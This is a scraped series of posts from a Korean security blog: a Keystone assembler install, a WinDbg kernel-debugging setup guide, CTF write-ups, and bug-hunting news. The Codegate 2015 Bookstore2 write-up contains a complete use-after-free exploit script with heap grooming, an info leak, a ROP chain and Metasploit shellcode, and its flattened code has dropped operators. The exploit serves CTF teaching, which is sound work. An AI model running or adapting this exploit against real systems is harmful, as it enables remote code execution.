keystone LICENSE.TXT Makefile MANIFEST.in README.md sample.py setup.py
[sweetchip@ubuntu python]$ sudo python setup.py install
running install
running build
running build_py
creating build
만약 python에서도 사용하고 싶다면 keystone/bindings/python/ 로 이동후에 설치해줍니다!
[sweetchip@ubuntu python]$ python sample.py
add eax, ecx = [ 66 01 c8 ]
add eax, ecx = [ 01 c8 ]
add rax, rcx = [ 48 01 c8 ]
add %ecx, %eax = [ 01 c8 ]
add %rcx, %rax = [ 48 01 c8 ]
sub r1, r2, r5 = [ 05 10 42 e0 ]
sub r1, r2, r5 = [ e0 42 10 05 ]
movs r4, #0xf0 = [ f0 24 ]
movs r4, #0xf0 = [ 24 f0 ]
ldr w1, [sp, #0x8] = [ e1 0b 40 b9 ]
v23.w=vavg(v11.w,v2.w):rnd = [ d7 cb e2 1c ]
and $9, $6, $7 = [ 24 48 c7 00 ]
and $9, $6, $7 = [ 00 c7 48 24 ]
and $9, $6, $7 = [ 24 48 c7 00 ]
and $9, $6, $7 = [ 00 c7 48 24 ]
add 1, 2, 3 = [ 7c 22 1a 14 ]
add 1, 2, 3 = [ 14 1a 22 7c ]
add 1, 2, 3 = [ 7c 22 1a 14 ]
add %g1, %g2, %g3 = [ 02 40 00 86 ]
add %g1, %g2, %g3 = [ 86 00 40 02 ]
a %r0, 4095(%r15,%r1) = [ 5a 0f 1f ff ]
설치 후 sample.py를 실행시켜 제대로 작동하는지 확인하니 잘 나오네요.
이제 이걸로 뭘 할까나..
'0x10 정보보안 > 0x14 Reverse Engineering' 카테고리의 다른 글
| 메모리 버그 디텍터 - ASAN (AddressSanitizer) 사용법 (3) | 2016.06.09 |
|---|---|
| 멀티 아키텍쳐 지원 어셈블러 Keystone (0) | 2016.06.08 |
| 윈도우 XP, 7에서의 WINDBG 를 이용한 Kernel Debugging (커널 디버깅) (3) | 2015.06.21 |
| IOS 앱 원본 바이너리 추출 및 복호화 - dumpdecrypted (10) | 2015.03.09 |
| [Fuzzer 만들기 프로젝트!] Pydbg 한번에 설치하기 (2) | 2013.10.04 |
| NewHeart 2013 Write ups - reversing (1) | 2013.05.29 |
Comment 0
KMPlayer 3.6.0.87 Exploit
안녕하세요.
오랜만에 포스팅 거리가 없었는데 새로 생겼네요!
제가 고3 시절 KISA 버그바운티 기념품으로 USB를 받았는데 잘 쓰다가 갑자기 죽어버린 USB가 있었습니다.
그 USB에는 여러 Exploit Code들과 제 자기소개서등이 들어있었는데 인식이 불가능해서 일단 보관해두고 있었는데
얼마전에 갑자기 인식에 성공해서 파일을 복구[?] 하는데 성공했습니다 ㅋㅋ
2013년에 시간이 멈춰버린 파일들을 구경하다 보니 별의별 것들이 나왔는데.. (bob 자기소개서, 대학 자기소개서, 모의전형 자기소개서 등..)
그중에 KMPlayer Exploit 코드가 있길래 2년이 반이라는 충분한 시간이 지났으니 공개해보려고 합니다 ㅋㅋ
이게 제 첫번째 공개 취약점이 될 것 같네요
당시에는 제 익스플로잇 기술이 매우 허접한 편이라서 매우 낮은 확률의 코드를 짰었네요..
취약점을 공부하는 분들을 위해서 패치기간이 2년이나 지났으니 더이상 동작하지 않을 것이라 보고..
예전 익스플로잇 코드를 공개하겠습니다. (사실 별거아닙니다.. 워낙 허접해서.. 확률도 30% 남짓이었던걸로 기억합니다.)
당시에 Exploit 조건이 매우 까다로워서 (ASLR, DEP ASCII Only etc) 어쩔수 없이 그랬던 걸로 기억하네요 :(
어쨋든!
공부하실 분들이 있을 것 같아 공개합니다 ㅎㅎ
위는 시연 영상입니다.
오랜만에 새벽에 뻘글.. :)
'0x10 정보보안 > 0x15 System' 카테고리의 다른 글
| KMPlayer 3.6.0.87 Exploit (4) | 2015.11.12 |
|---|---|
| 기술문서 - Introduction to IE's memory protection (0) | 2015.01.15 |
| [POC] Power Of XX 여성해킹대회 본선 - Brokenwindow (7) | 2014.11.09 |
| [Memory Protection] Internet Explorer - VTguard에 대하여 (2) | 2014.08.20 |
| CVE-2012-4792 IE Use-After-Free Analysis and Exploit (2) | 2014.04.26 |
| 2014 CodeGate Junior PreQual - Lotto (1) | 2014.02.16 |
Comment 4
[Documents] 블로그에서 배포한 문서들
안녕하세요.
요즘 포스팅에 쓸게 없다보니 예전부터 지금까지 배포했던 문서들을 모아둘까 해서 포스팅 해보려고 합니다.
처음 보안 공부를 접했을 때부터 exploit 관련 분야만 연구하다보니 글을 처음 쓰는 시간 기점으로 모두 Exploit분야밖에 안보이네요!
그래도 가끔씩 컨퍼런스 같은 곳에서 새로운 사람을 만날때 그때 그 문서, 그 자료를 잘 봤다고 인사를 해주는 분이 있는데
그럴때마다 보람을 느끼네요 ㅋㅋ
요즘은 별로 쓸 것도 없고 대단한 것도 아니니 잘 안쓰고 그냥 블로그 포스팅에 하나 남기고 있는데 언제가 될 진 모르지만 문서들을 계속 써볼 예정입니다.
아래는 제가 지금까지 작성한 문서들 리스트입니다. (아직은 4건밖에 없네요.)
2015/01/15 - [0x10 정보보안/0x15 System] - 기술문서 - Introduction to IE's memory protection
- Microsoft Internet Explorer 에 적용되어 있는 Custom Memory Protection들에 대한 소개입니다.
- 여러 브라우저가 그렇듯이 IE도 또한 자신들의 프로그램을 공격하기 어렵게 하기 위해서 각가지 메모리 보호기법을 제작하고 적용했습니다.
- 적용된 보호기법이 어떤 것들이 있는지 알아보고 직접 우회해본 경험담을 바탕으로 작성되었습니다.
2014/04/26 - [0x10 정보보안/0x15 System] - CVE-2012-4792 IE Use-After-Free Analysis and Exploit
- 차세대 보안리더 양성 프로그램 Best Of the Best 2기 프로젝트로 웹브라우저 해킹이 있었는데 프로젝트를 시작할 때 제작한 과거 취약점 분석 입니다.
- 분석 뿐만 아니라 실제로 어떻게 분석을 해야하는지 windbg 명령어로 초반 입문 하는 분들에게는 분명 도움이 되실 겁니다.
2014/08/20 - [0x10 정보보안/0x15 System] - [Memory Protection] Internet Explorer - VTguard에 대하여
- 이 당시에는 그리 긴 문서가 아니라서 그냥 웹에 적은 문서입니다.
- Vtguard를 Memory Leak 버그를 사용하지 않고 EIP를 변경할 수 있는 방법론 입니다.
- 실제 우회 성공 이후 작성한 문서입니다.
2013/05/22 - [0x10 정보보안/0x15 System] - Basic of Real World Exploit on windows [Document]
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
| 지금까지 찾았던 취약점 POC 공개! (1) | 2018.05.23 |
|---|---|
| [Documents] 블로그에서 배포한 문서들 (3) | 2015.08.17 |
| Defcon 2015 coding challenge write-up (0) | 2015.05.18 |
| Codegate 2015 Bookstore2 Write-up [Exploit] (2) | 2015.04.18 |
| Codegate 2015 Bookstore Write-Up [Exploit] (0) | 2015.04.17 |
| CodeGate 2014 PreQual WeirdShark, dodoCrackme (2) | 2014.02.25 |
Comment 3
MSRC Top 100 선정!
얼마전 Blackhat 컨퍼런스에서 블랙햇 후원사인 MS가 회사부스에 위와 같은 내역을 공개했다고 합니다.
전 세계의 MS의 보안 취약점을 제보한 해커 TOP 100명을 선정한 결과라고 알고 있는데 그중 91위에 오르게 되었네요.
사실 1~30위 정도 사람들의 이름을 보니 사실상 MS의 보안취약점을 없애는데 하드캐리 하고 있는 분들이라서 아직은 넘사벽인 것 같네요.
이번엔 라스베가스를 갈 일이 없어서 인터넷으로나마 소식을 접하던 와중에 블랙햇 컨퍼런스 첫날부터 1~50위에 본인의 이름이 올랐다는 트위터 소식을 여러개 보긴 했으나
51~100위 리스트가 한번에 있는 사진은 아예 없더군요.. 심지어 75위까지 올라간 사진이 있어서 살짝 기대했는데 역시나 없더군요 ㅠㅠ (하지만 75위까지 사람들 이름을 보니 그럴만도 합니다 ㅋㅋ 유명한 사람들이 많죠)
하지만 어제 100위까지 있는 사진이 다시 끌올[?] 되어서 작은 기대를 가지고 봤더니 찾을 수 있었습니다.
비록 끝자락인 91위지만 그냥 단순히 이름이 올라갔다는 것에 대해서는 매우 만족하고 있습니다. ㅋㅋ
얼마전 MS에서 VIP dinner의 제목으로 메일이 왔었는데 아마 이것에 영향을 받지 않았나 합니다. (아니면 버그를 제보해준 사람에게 모두 돌린 메일 일지도?)
하지만 전제조건이 블랙햇이 끝나는 날 라스베가스에서 저녁 사줄게! 라는 내용이어서..; 아쉽게도 다음 기회로 넘기게 되었습니다.
어쨋든 버그헌팅에서 예상치도 못한 성과가 나오다 보니 요즘 이상한 버그들만 나와서 금이 갔던 멘탈을 조금이나마 위로 해주는 느낌이네요.
비록 낮은 순위지만 앞으로 버그헌팅을 열심히 해야겠다는 의미로 다시 열라 해야겠네요. ㅋㅋ
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
| GITHUB 업데이트 완료! (0) | 2017.04.04 |
|---|---|
| 무료 SSL 인증서 발급 받기 (letsencrypt) (0) | 2017.02.02 |
| MSRC Top 100 선정! (5) | 2015.08.16 |
| Inc0gnito 2014 - Fuzzing For Fun (6) | 2014.08.20 |
| 생애 첫 국외 프로그램 취약점 헌팅 (6) | 2014.07.31 |
| Microsoft Internet Explorer 11 0-day Exploit POC (1) | 2014.06.01 |
Comment 5
윈도우 XP, 7에서의 WINDBG 를 이용한 Kernel Debugging (커널 디버깅)
매번 똑같이 오랜만의 포스팅..
요즘은 커널에 대해서 공부하고 있습니다.
아니나 다를까 공부에는 항상 삽질이 따르네요.
VMware의 Workstation과 Vsphere에서 커널디버깅을 시도해보려고 구글링도 해보다가 실패해서 이것저것 삽질하던 도중 드디어 해결하게 되었습니다.
나중에 까먹을까봐 다시 포스팅!
우선 BOB 할때 알렉스에게 받은 Windbg 파일..
아래 file1, file2 둘중 아무거나 받으시면 됩니다. 같은거에요
===============================
file 1
kdbg.7z.001==============================
file 2
윈도우 XP에서의 커널 디버깅 환경 세팅
- Windows XP
- VMware Workstation 11
1. 윈도우XP가 깔린 VM이미지의 속성을 들어간다.
2. 위와 같이 설정에 들어갔으면 아래 Add 버튼을 누른다.
그리고 시리얼 포트를 선택하고 Next를 누른다.
다음 화면은 귀찮아서 캡쳐 실패. 그런데 그냥 텍스트로 적어도 무방할 것 같다.
3. Serial Port 설정에서 'Output to named pipe' 선택 후 Next 클릭
4. Named pipe에 '\\.\pipe\name' 식으로 파이프의 이름을 만들어준다. 예를들어서 '\\.\pipe\sweetchip' 도 좋다.
4-1. 그리고 This end is the client. 와 This other end is an application 각각 선택!
그래서 설정을 살펴보면 이렇게 되도록 한다.
체크할 부분은 Use named pipe와 I/O mode이다.
5. 마지막! I/O mode의 Yield CPU on poll을 체크한다.
그러면 VM웨어에서의 세팅을 마쳤다. 이제 XP에서 설정해보자.
6. XP의 시작 - 실행 - msconfin 입력
7. 시스템 구성 유틸리티의 BOOT.INI 탭 선택
8. 하단 고급 옵션 클릭.
9. 그리고 /DEBUG 체크, /DEBUGPORT, /BAUDRATE 체크
10. 각각 설정을 위 사진처럼 설정. (디버그 포트는 COM1번, BAUDRATE는 115200)
Windows XP에서의 설정은 마쳤고 마지막으로 windbg에서 설정을 해야한다.
Windbg의 설정은 공통설정에서 하겠다.
11. 공통으로 이동
윈도우7 에서의 커널 디버깅 환경 세팅
1. 우선 Windows 7에서 설정을 해줘야 한다.
- XP에서와 마찬가지로 시작 - 실행 - msconfig 입력
- 부팅 탭에서 고급옵션 클릭
- 고급 옵션 창에서 디버그, 디버그 포트, 전송속도 체크 및 아래와 같이 설정
2. 그리고 윈도우7의 전원을 끈다.
3. VMware에서 이미지의 속성을 들어간 뒤 하드웨어의 장치를 추가해줘야 한다.
- Virtual Machine Settings에서 Add 클릭
- Serial Port 클릭 후 Next
- Named Pipe에 위와 같이 설정.
- 파이프 이름 설정 - \\.\pipe\name (파이프 이름의 경우는 자유, 위 사진처럼 자유로 설정.)
4. 그리고 I/O mode에서 Yield CPU on poll 체크
5. 공통으로 이동
[공통] Windbg에서 커널 디버깅하기
1. Windbg의 상단탭 File - Kernel Debugging에 들어간다.
2. COM 탭 클릭후 아래 사진처럼 세팅한다.
3. VMware에서 VM 시작을 누르면..
4. 성공
성공이다!. 사진에서는 Windows XP인데 7이면 Windows 7 이라고 나온다
만약 위와 같은 과정으로 설정 해도 실패할 경우 아래를 살펴보세요,
지금까지 위처럼 해도 디버기가 디버거에 안붙길래 도데체 무슨 일이지 하고 있던 차에 무언가 이상한 것을 발견했다.
위의 경우는 Serial Port를 추가하면 이름은 Serial Port이다.
그러나 나의 경우는 Serial Port 2 라고 이름이 생성되었다. 그 말인 즉, 어떤 장치가 이미 시리얼 포트를 쓰고 있던 것이다.
범인은 바로 프린터(Printer)가 COM1를 사용하고 있었고 이 친구 덕분에 위 설정으로는 디버기가 붙지 않게 되었다.
그러므로 VM에서 프린터가 쓸 일이 없다면 COM1 포트를 사용하기 위해서 과감하게 삭제 하고 붙이면 잘 작동 할 것이다.
허무.. 어쨋든 이제야 잘 붙는다 오예!
끝.
'0x10 정보보안 > 0x14 Reverse Engineering' 카테고리의 다른 글
| 메모리 버그 디텍터 - ASAN (AddressSanitizer) 사용법 (3) | 2016.06.09 |
|---|---|
| 멀티 아키텍쳐 지원 어셈블러 Keystone (0) | 2016.06.08 |
| 윈도우 XP, 7에서의 WINDBG 를 이용한 Kernel Debugging (커널 디버깅) (3) | 2015.06.21 |
| IOS 앱 원본 바이너리 추출 및 복호화 - dumpdecrypted (10) | 2015.03.09 |
| [Fuzzer 만들기 프로젝트!] Pydbg 한번에 설치하기 (2) | 2013.10.04 |
| NewHeart 2013 Write ups - reversing (1) | 2013.05.29 |
Comment 3
Defcon 2015 coding challenge write-up
이번에 데프콘 대회는 순천향대 Security First, Leaveret 그리고 저희 동아리인 SSG 연합으로 나가게 되었는데
이상하게도 작년보다 난이도가 더 어려운것 같네요.
문제들을 분석한것도 많고 취약점도 찾았지만 Exploit을 하지 못한 문제가 상당히 많았습니다 ㅠㅠ
이번 포스팅에는 그냥 문제중 한개인 코딩 챌린지를 풀이하도록 하겠습니다. (문제 이름이 기억이 안나서 그냥 코딩 챌린지로 했습니다,)
#!/usr/bin/env python
import subprocess, os, tempfile
from ctypes import *
import os
from socket import *
import time
import struct
# from pyasm import Program
# from pyasm.instructions import push, mov, ret, pop
# from pyasm.registers import eax, esp, ebp
from distorm3 import Decode, Decode16Bits, Decode32Bits, Decode64Bits
p= lambda x: struct.pack(" PAGE_SIZE = 4096 class AssemblerFunction(object): def __init__(self, code, ret_type, *arg_types): # Run Nasm fd, source = tempfile.mkstemp(".S", "assembly", os.getcwd()) os.write(fd, code) os.close(fd) target = os.path.splitext(source)[0] subprocess.check_call(["nasm",source]) os.unlink(source) binary = file(target,"rb").read() os.unlink(target) bin_len = len(binary) # align our code on page boundary. self.code_buffer = create_string_buffer(PAGE_SIZE*2 bin_len) addr = (addressof(self.code_buffer) PAGE_SIZE) & (~(PAGE_SIZE-1)) memmove(addr, binary, bin_len) # Change memory protection self.mprotect = cdll.LoadLibrary("libc.so.6").mprotect mp_ret = self.mprotect(addr, bin_len, 4) # execute only. if mp_ret: raise OSError("Unable to change memory protection") self.func = CFUNCTYPE(ret_type, *arg_types)(addr) self.addr = addr self.bin_len = bin_len def __call__(self, *args): return self.func(*args) def __del__(self): # Revert memory protection if hasattr(self,"mprotect"): self.mprotect(self.addr, self.bin_len, 3) def mov(data): result = [] data = data.split("\n") for i in data: if "=" in i: tmp = i.split('=') result.append("mov " tmp[0] ", " tmp[1]) return "\n".join(result) if __name__ == "__main__": ip = "catwestern_631d7907670909fc4df2defc13f2057c.quals.shallweplayaga.me" port = 9999 s = socket(AF_INET, SOCK_STREAM) s.connect((ip, port)) lst = [] inst = s.recv(1024) # print inst instructions = s.recv(1024).split("\n")[2] print instructions print instructions.encode("hex") l = Decode(0, instructions, Decode64Bits) t_ins = "" for i in l: t_ins = i[2] "\n" movs = mov(inst) # print movs # print t_ins result = "****Initial Register State****\n" result = "" registers = ["rax","rbx","rcx","rdx","rsi","rdi","r8","r9","r10","r11","r12","r13","r14","r15"] for i in registers: add_func = """BITS 64\n""" movs "\n" t_ins.replace("RET\n", "") """mov rax, """ i """ ret """ print add_func Add = AssemblerFunction(add_func, c_uint64, c_uint64, c_uint64) result = i "=" str(hex(Add(ord(os.urandom(1)), ord(os.urandom(1))))) "\n" result = result.replace("L", "") s.send(result) print result print s.recv(1024) """ rax=0x9c8982fc3b5cfae9 rbx=0x20223acc7e6949cb rcx=0x3a46c99c rdx=0xd5239501c5b48bd rsi=0xbabfac6bbf67bbfd rdi=0xe8fb6dcfe0000000 r8=0xcde6d06e980dd1ce r9=0x339f0bb7dee53e3e r10=0x23a769fd87124021 r11=0x2cb79cbedc86431f r12=0x4d32ab24658d00be r13=0x7dab448d20a82708 r14=0x3c8b784c r15=0x43ccf3fcf39883c6 The flag is: Cats with frickin lazer beamz on top of their heads! """
문제는 간단하게 64비트 레지스터와 어셈블리 코드를 바이트코드화 해서 클라이언트에게 보내줍니다.
그러면 저희는 그 정보를 받아서 바이트 코드를 실행하고 레지스터 정보를 다시 되돌려 줘야 하는 문제인데요,
구글링해서 python에서 어셈블리 명령어를 실행하고 실행한 명령어의 결과값을 받아오는 스크립트가 있었습니다.
하지만 보내야 하는 것은 레지스터들 정보들이라서 결과값으로는 부족합니다.
그래서 쓴 간단한 꼼수가 함수의 결과값을 받아오는 스크립트이니 마지막에 mov rax, registers 를 붙여서 모든 레지스터의 값을 리턴하고 그 값을 받아오도록 코딩했습니다.
그래서 한번 실행하면 16개의 레지스터들을 모두 얻어오고 서버로 보내면 키값을 되돌려 줍니다.
그래서 저 스크립트를 실행시키면
The flag is: Cats with frickin lazer beamz on top of their heads!
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
| 지금까지 찾았던 취약점 POC 공개! (1) | 2018.05.23 |
|---|---|
| [Documents] 블로그에서 배포한 문서들 (3) | 2015.08.17 |
| Defcon 2015 coding challenge write-up (0) | 2015.05.18 |
| Codegate 2015 Bookstore2 Write-up [Exploit] (2) | 2015.04.18 |
| Codegate 2015 Bookstore Write-Up [Exploit] (0) | 2015.04.17 |
| CodeGate 2014 PreQual WeirdShark, dodoCrackme (2) | 2014.02.25 |
Comment 0
Codegate 2015 Bookstore2 Write-up [Exploit]
제가 이번 코드게이트에 출제한 문제는 총 2문제로 bookstore 와 bookstore2 이고 이번 포스팅은 Bookstore2 문제 풀이입니다.
흔하지 않은 유형의 문제라고 생각하는데 바로 windows 운영체제에서의 pwnable 입니다.
일반적인 리눅스에서의 Pwnable 문제를 Windows에 적용시켜봤습니다.
이 문제는 원래 예선에서 내려고 했던 문제인데 아무래도 윈도우 문제이고 사람이 많다보니 운영에 문제가 될 수 있을것 같아서 본선에서 출제하기로 했습니다.
본선장에서는 대회가 끝나기 대략 6시간전에 2시간 뒤에 윈도우 문제가 나올것이라고 미리 말해주고 서버 환경을 알려줬습니다.
또한 대회 전날까지 고의적으로 키값등을 삭제하는 부정행위를 방지하기 위하여 리눅스의 wine에서 돌려보자는등 여러가지 의견이 나왔었는데,
계속 고민한 결과 Low Integrity Process로 설정하여 운영하기로 했습니다.
사실 코드게이트에선 아마 윈도우 문제가 처음일텐데 여러가지 걱정도 있기도 했고 늦게나마 안 사실이지만 문제에 약간 오류(오타)가 있었습니다. (푸는데는 지장이 없으니 다행이네)
아무래도 마지막쯤에 취약점을 갑자기 바꾸고 주니어 대회 네트워크를 세팅하느라 정신이 없었던듯 하네요. 다음엔 이점을 주의해야 할것 같네요.
그리고 문제가 다른 문제에비해 약간 쉬운편이다 보니 배점이 낮아서 그런지 처음에는 6팀 정도가 문제를 잡다가 후반엔 3팀 정도가 문제를 잡고 있었습니다.
아쉽게도 본선장에선 문제가 풀리진 않았지만, 대회가 끝나고 나서 몇몇사람들로부터 문제를 풀었다라고 답이 왔네요!
끝나고라도 풀리니 다행... ㅎㅎ
이번 문제에서도 마찬가지로 Exploit 방법과 POC코드만 올리도록 하겠습니다.
Bookstore2 Binary---------------------------------------------------
bookstore2.exe--------------------------------------------------------------------
Server Environment
- Windows 7 Ultimate 32bit
- Low Integrity Process
Vulnerability
- Use-After-Free
Memory Protection
- ASLR, DEP, Stack Cookie, Safe SEH
문제의 컨셉은 예선에 나온 bookstore와 같은 컨셉으로 서점의 책을 관리해주는 컨셉의 어플리케이션이다.
참고로 이번 문제는 환경에 영향을 받지 않도록 제작한 문제이다.
그래서 단순하게 바이너리 안에 있는 정보 만으로도 충분히 Exploit이 가능하도록 만들었고 동일한 Payload로 Windows7, windows8, windows8.1 에서 유니버셜하게 작동하는 Exploit을 제작할 수 있다. (그러나 win8에선 Heap Allocation 문제로 약간 확률이 떨어지는 현상이 있었으나 Exploit이 작동하는것은 확인했다.)
문제 취약점은 Heap영역에서 발생하는 Use-After-Free이다.
이번 문제도 리얼월드에 가깝게 만든 문제들인데, Chrome, Firefox, Internet Explorer 등에 적용되어있는 Heap Isolation을 흉내낸 문제이다.
바이너리를 까보면 CreateHeap 함수로 새로운 힙영역을 만들고 그 부분에 Ebook과 Book 구조체를 할당한다.
하지만 바이너리를 살펴보면 특정상황일때 book이나 ebook 구조체를 Free하지만 그 구조체에 대한 포인터를 완전히 지우지 않음으로써 발생하는 취약점이다.
보통 지금까지 UAF라면 특정 데이터가 Free되서 새로운 string 힙을 만들어서 쉽게 free된 영역에 Re-allocation이 가능했을 것이다.
그러나 이번 문제는 Heap Isolation으로 인하여 Process Heap (이하 힙A)과 HeapCreate로 생성된 새로운 Heap(이하 힙B)에 따로 분리되어 저장되는것을 볼 수 있다.
다시 말하면 힙A에는 일반 string, 일반 데이터가 저장되지만 힙B 에서는 이 데이터들이 모여 저장된 구조체가 저장된다는 것이다.
또한 UAF 취약점은 힙B의 데이터에서 발생하고 그 데이터에는 Function Pointer가 포함되어 있어서 Reallocation을 통하여 Function Pointer를 조작하는것이 목적이다.
그럼 힙B에는 string도 할당이 불가능하고 일반 데이터도 할당이 불가능하고 오직 가공된 구조체만 할당할 수 있다.
그럼 어떻게 해야 할까?
문제를 풀때 구조체를 분석해보면 Book과 Ebook의 구조체의 크기가 약간 다르다는걸 볼 수 있을 것이다.
또한 해커가 데이터를 완전히 Control할 수 있는 크기는 12바이트라는 것도 볼 수 있을 것이다.
이 점을 이용하여 다음과 같이 생각해보자.
예를들어서 0x40 크기를 가진 A 구조체와 0x3c를 가진 B 구조체가 있다고 할때 A라는 힙이 할당되면 실제 힙 영역에서는 다음과 같은 모습일 것이다.
Struct_A ----------------------------------
HHHHHHHHDDDDDDDDDDDDDDDD
| Header | ... Data 0x40 ... |
-----------------------------------------
그리고 B 구조체는 다음과 같을 것이다.
Struct_B ----------------------------------
HHHHHHHHDDDDDDDDDDDD
| Header | .. Data 0x3c .. |
-----------------------------------------
이중 일부 데이터가 Controllable 하다고 하고 일부 데이터가 Function Pointer 라고 하자.
구조체 A를 먼저 힙에 쭉 뿌려두고 모두 Free시킨다. 하지만 포인터는 여전히 남아있을 것이다.
그다음 구조체 B를 힙에 할당시키면 Free된 힙의 처음 부분부터 할당될 것이다.
위 사진처럼 할당을 하면 어딘가에서는 Controllable한 데이터와 Function Pointer가 만나는 지점이 있을 것이다.
이 문제에선 위 원리를 이용하여 Infoleak과 EIP Control이 가능하다.
Exploit Code
아래는 위 원리를 적용한 Exploit이며
Windows 7, Windows 8.1에서 작동하는것을 확인했다.
실제로 Exploit시 metasploit의 Reverse Shell을 붙여주는 쉘코드를 사용하여 문제를 풀었다.
import os
from socket import *
import struct
import time
p = lambda x : struct.pack(" import re shellcode = ("\xba\x02\x27\xc8\x90\xd9\xe1\xd9\x74\x24\xf4\x5e\x33\xc9" "\xb1\x32\x31\x56\x12\x83\xc6\x04\x03\x54\x29\x2a\x65\xa4" "\xdd\x23\x86\x54\x1e\x54\x0e\xb1\x2f\x46\x74\xb2\x02\x56" "\xfe\x96\xae\x1d\x52\x02\x24\x53\x7b\x25\x8d\xde\x5d\x08" "\x0e\xef\x61\xc6\xcc\x71\x1e\x14\x01\x52\x1f\xd7\x54\x93" "\x58\x05\x96\xc1\x31\x42\x05\xf6\x36\x16\x96\xf7\x98\x1d" "\xa6\x8f\x9d\xe1\x53\x3a\x9f\x31\xcb\x31\xd7\xa9\x67\x1d" "\xc8\xc8\xa4\x7d\x34\x83\xc1\xb6\xce\x12\x00\x87\x2f\x25" "\x6c\x44\x0e\x8a\x61\x94\x56\x2c\x9a\xe3\xac\x4f\x27\xf4" "\x76\x32\xf3\x71\x6b\x94\x70\x21\x4f\x25\x54\xb4\x04\x29" "\x11\xb2\x43\x2d\xa4\x17\xf8\x49\x2d\x96\x2f\xd8\x75\xbd" "\xeb\x81\x2e\xdc\xaa\x6f\x80\xe1\xad\xd7\x7d\x44\xa5\xf5" "\x6a\xfe\xe4\x93\x6d\x72\x93\xda\x6e\x8c\x9c\x4c\x07\xbd" "\x17\x03\x50\x42\xf2\x60\xae\x08\x5f\xc0\x27\xd5\x35\x51" "\x2a\xe6\xe3\x95\x53\x65\x06\x65\xa0\x75\x63\x60\xec\x31" "\x9f\x18\x7d\xd4\x9f\x8f\x7e\xfd\xc3\x4e\xed\x9d\x03") # calc shellcode from metasploit :) ip = "200.200.200.5" port = 1337 ss = socket(AF_INET, SOCK_STREAM) ss.connect((ip, port)) eip = 1 eip1 = 1 eip2 = 1 def r(): result = "" try: while 1: ss.settimeout(0.001) # ss.settimeout(0.3) tmp = ss.recv(1) result = tmp if len(tmp) == 0: #print tmp break except: pass return result def s(a): ss.sendall(a) def login(): print r() s("helloadmin\n") print r() s("Iulover!@#\n") def makebook(): print r() s("1\n") print r() s("1\n") print r() s("bookname\n") print r() s("description\n") print r() s("1094795581\n") print r() s("1094795580\n") print r() s("1\n") def makeebook(): print r() s("1\n") print r() s("2\n") print r() s("bookname\n") print r() s("description\n") print r() s(str(int(eip1)) "\n") # EIP 4 print r() s(str(int(eip)) "\n") # EIP print r() s(str(int(eip2)) "\n") # EIP 8 def forcefree(target): print r() s("2\n") print r() s(str(target) "\n") # index print r() s("3\n") print r() s("-1\n") print r() s(str(int(0x43434343)) "\n") print r() s(str(int(0x42424242)) "\n") print r() s("4\n") print r() s("0\n") print r() s("0\n") print r() s("3\n") print r() s(str(target) "\n") # index def put_gadget(gadget, index): print r() s("2\n") print r() s(str(index) "\n") print r() s("2\n") print r() s(gadget "\n") print r() s("0\n") def view(target): print r() s("4\n") print r() s(str(target) "\n") # taarget return r() def payload(baseaddress): virtualalloc_warp = baseaddress 0x2070 #fix fgets_wrap = baseaddress 0x1460 #fix ppppr = baseaddress 0x9dff #fix pppr = ppppr 1 ppr = pppr 1 pr = ppr 1 r = pr 1 virtual_space = 0x00100000 result = "" result = p(r) * 10 result = p(virtualalloc_warp) result = p(pppr) result = p(virtual_space) result = p(0x10000) result = p(0x40) # result = p(0x41414141) result = p(fgets_wrap) result = p(ppr) result = p(virtual_space) result = p(len(shellcode) 2000) result = p(virtual_space 20) return result ################################ START time.sleep(0.1) login() ################################ INFO LEAAK # time.sleep(10) total = -1 for i in range(0, 4): makeebook() total = 1 for i in range(0, 4): forcefree(i) for i in range(0, 4): makebook() total = 1 data = view(2) # infoleak print "data = " data found = re.findall("Price : (.*)\n", data) print found ################################# Make Payload baseaddr = int(found[0].replace("\r",""))&0xFFFF0000 gadget1 = baseaddr 0x1e97 #fix """ xchg eax, esp pop ecx pop eax retn """ memory = baseaddr 0x171c0 # global var #fix eip = gadget1 eip1 = memory eip2 = gadget1 put_gadget(payload(baseaddr), 6) ################################# Exploit for i in range(0, 4): makebook() total = 1 for i in range(0, 4): forcefree(7 i) for i in range(0, 4): makeebook() total = 1 print view(7 3) # infoleak s("\x90"*100 "\xbc\x00\x50\x10\x00" "\x90"*500 shellcode "\x90"*500 "\xcc" "\n") print r() print hex(baseaddr) time.sleep(1)
끝!
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
| [Documents] 블로그에서 배포한 문서들 (3) | 2015.08.17 |
|---|---|
| Defcon 2015 coding challenge write-up (0) | 2015.05.18 |
| Codegate 2015 Bookstore2 Write-up [Exploit] (2) | 2015.04.18 |
| Codegate 2015 Bookstore Write-Up [Exploit] (0) | 2015.04.17 |
| CodeGate 2014 PreQual WeirdShark, dodoCrackme (2) | 2014.02.25 |
| CodeGate 2014 PreQual CloneTechnique (2) | 2014.02.25 |
Comment 2
Codegate 2015 Bookstore Write-Up [Exploit]
올해 코드게이트는 우리회사에서 진행하게 되어서 나도 함께 문제를 출제하게 되었는데
사실 이번 코드게이트 같이 매우 큰 규모의 CTF에서의 문제 출제는 처음이었다.
그래서 어느 문제를 내야할지 상당히 고민을 많이 했는데, 난이도가 어려운 문제는 이미 다른 멤버들이 담담해주시니 ㅋㅋ
나는 지금까지 리얼월드에서 찾은 취약점중 재미있던 취약점을 문제에 적용시키기로 했다.
그리고 중간고사 직전인 지금 중간고사 공부가 재미없어서 오랜만에 블로그에 글이나 써볼까 하다가..
나오게된 셀프 Write-Up!
Bookstore -
Bug Class : Uninitialized memory reference
문제의 컨셉은 서점의 책을 관리해주는 간단한 어플리케이션이다.
바이너리는 32비트이며 PIE / ASLR / NX 모두 적용되어있는 바이너리이다.
아마 이런 유형의 취약점을 처음 찾아본다면 취약점을 찾는데 약간 어려웠을 수도 있는데 문제를 풀고나면 생각보다 간단했을 것이다.
이미 다른 분들이 써둔 Write-up이 있으니 이 포스팅에선 문제 버그에 대한 원리만 간단하게 설명해보도록 하겠다.
예를들어서 위와 같은 구조체가 있다고 하자.
이때 우리가 새로운 구조체를 스택(지역변수)에 만들었다고 한다고 할때 기본적으로 구조체라면 위와 같이 생겼을 것이다.
그래서 필요한 경우에 따라 위처럼 값을 채워나갈 것이다.
그리고 위에 보면 그대로 0인 부분이 있는데 이 부분은 정상적인 0인 값이거나 내가 별도로 초기화 하지 않은 부분이다.
